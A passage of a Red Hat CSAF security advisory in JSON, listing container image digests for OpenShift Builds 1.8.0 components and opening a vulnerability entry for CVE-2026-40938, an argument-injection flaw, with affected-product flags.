"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:77414b7533c13515a757d2c74641d1ce80330aab8146fd4ea57f837a989507a6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:c918825ce8fa23b002d7469ee2efbb86ee10461f05578bce92f4b7e869482247_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:d98cd490064b491c1113af559323718744b8ffc5e0ff59866618382f3b8dfb4f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:f38e14bf78db8b645a3e80c9471d01d5adb4f6bc8d73e9444fed41f8e83a1766_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:4a5817f19afd6283e5aab8f654161f37e8ab750589d87adc4cf980391e2f4a15_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:52ab953841b19453f0e57842ee3341eadbb8b590224dc395e5c509e0d0931aff_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:89cfd055558b213ba418429aa77e88199cfd3f8855b40330682b720e6878bc20_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:b662ccd26b72796528890793a62b3e53cd9604e4da241dd2547abc8de3249f16_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:53ba1b9762390a2d770d02c6e338369e40b65f98386c8b2581d3281dae59640f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b22f8e3a951f48f9f4b6dd92a28092b5fa87df44e1120ac21bc6a23e0890f9fa_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:b40dd41d99d06f9ff1472316da8cdab0350427fc1c224699ae84bdd0af558b26_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:c295cee29b87190bd9b182445ded759c09d61348c8784333739e442b715d4d78_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:45d30010ea88f55261490bb7c96e2fa6436813117693a4bb4a505f91f997aae1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:5848c62e2f1d9341b772c2fba1b9dfa982cf3855639e6ebc8a1125dc68b3c0de_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:6c65e9231f007f23364f433a37943c84a6d2cb325f2e61bea2080c787bd60fc9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:b63c208036810de42e4bde48cfdf8b0ea663059e8fc3b8560a323664e512a0b1_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:397257c4af010f9a7db625496126aadbd7d93b2547b3c1b7e76e68e8997ffd76_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:d91312e9b8d72a52f23badc6f37ea2d8d3563f0539810ad8e7b743b4821034f2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:fd079d2ad390e30cd020511fb5ae2a84d1aee8d832abc365406c990e0550c562_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2a0fb60a6ad70f2cb4bc7ee7386ef098075f881ab7f4d3f36cd44a27f06844b0_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:856d5618a459ffd63c6912966f0c7bd75eafb33d4aba08f8bb66191acb85c29c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:8ed4709391cf2ee6711391b85284504808fc9dbfc4010f89f32fec5078a94d46_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:926ed75fdc3186a32d01fc2eb0846797152652b8604ca05ffff552f784eef6b5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0a56925e0eecfd250a787464b522551e503d5d95d3f636f39ac01a1ff5b9b07a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64 as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:0b93e1e65236c6cfc31ae5307b7e31854709d7da5dbababe78073ae20941b6be_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:630eac365e5a803e7a0448a117d271ca5c3d3d680f9ee26464ad4207cf01d99a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x as a component of Red Hat OpenShift Builds 1.8.0",
"product_id": "Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:f6244e8e60924308ff5badf7444839b987d0e186910e729d1470886597b8e7cd_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.8.0"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-40938",
"cwe": {
"id": "CWE-88",
"name": "Improper Neutralization of Argument Delimiters in a Command (\u0027Argument Injection\u0027)"
},
"discovery_date": "2026-04-21T21:02:16.557479+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:b5e71156c80f4b61fde538d96d7142a2770a94f7bb51b53e6ba9f70e5b710022_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:131fc471ed9e63278ba3cba3c3717d10a91321707b5a5b99f567065a1853bdd2_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:89c9e3cc2b26af93e654ec385807775dff4e6f2900e41ac72fa76cb8a1e258a2_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:b4141b82dc4a149687f3f9d4125ea4dc5cbd0d53473de357c8009f4b89c362e3_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:cf39664e98cb24c06088b3046165c81d8c6dc07d5da77e19401879595f581ff4_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:0f2024194784ddef2d10755a1c04d3bc6ca18ddeba4cdd171ce6e47fed0d7892_s390x",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:1d2a091427e33a3e0c081c69a2cadf329e8a1fb618f69348328721acae6ec6b6_amd64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:3d177aa899501feae044a5c1a306cd3257153d49a1276af5ae1b13c1cdb2b6df_ppc64le",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:8f41177b3bc405f921d26976d676f6077a8058d4083c980ab1631af90fc51f66_arm64",
"Red Hat OpenShift Builds 1.8.0:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:27094041cb5b14a0f368baf89fa8b0e0141665ec3c35f9f96c87fa8c3975c9a1_ppc64le",
